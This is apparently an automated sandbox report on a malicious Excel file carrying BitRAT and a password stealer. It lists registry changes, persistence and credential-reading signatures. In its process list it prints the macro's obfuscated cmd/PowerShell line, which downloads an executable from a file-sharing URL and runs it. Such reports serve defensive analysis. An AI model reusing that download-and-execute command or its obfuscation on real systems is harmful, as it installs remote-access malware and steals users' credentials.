Malware Analysis Report

2025-01-03 05:28

Sample ID 230918-wzbejaea23
Target RomaniaRequestImunSRL092023_JC.xls
SHA256 896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01
Tags
macro macro_on_action bitrat xenarmor collection password recovery spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01

Threat Level: Known bad

The file RomaniaRequestImunSRL092023_JC.xls was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action bitrat xenarmor collection password recovery spyware stealer trojan upx

Process spawned unexpected child process

XenArmor Suite

BitRAT

Suspicious Office macro

Downloads MZ/PE file

Blocklisted process makes network request

Office macro that triggers on suspicious action

Executes dropped EXE

Reads data files stored by FTP clients

Loads dropped DLL

Reads local data of messenger clients

UPX packed file

ACProtect 1.3x - 1.4x DLL software

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Accesses Microsoft Outlook accounts

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Program crash

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-18 18:21

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-18 18:21

Reported

2023-09-18 18:23

Platform

win7-20230831-en

Max time kernel

117s

Max time network

120s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls

C:\Windows\SysWOW64\cmd.exe

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

Network

N/A

Files

memory/2148-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2148-1-0x0000000071D4D000-0x0000000071D58000-memory.dmp

memory/2148-4-0x0000000005E90000-0x0000000005F90000-memory.dmp

memory/2616-7-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2616-8-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2616-9-0x00000000027A0000-0x00000000027E0000-memory.dmp

memory/2616-10-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2148-11-0x0000000071D4D000-0x0000000071D58000-memory.dmp

memory/2148-12-0x0000000005E90000-0x0000000005F90000-memory.dmp

memory/2148-13-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2148-14-0x0000000071D4D000-0x0000000071D58000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-18 18:21

Reported

2023-09-18 18:23

Platform

win10v2004-20230915-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls"

Signatures

BitRAT

trojan bitrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

XenArmor Suite

recovery password xenarmor

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Public\l6hv4.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Public\l6hv4.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3476 set thread context of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 4436 set thread context of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 2196 set thread context of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 set thread context of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 492 set thread context of 4460 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
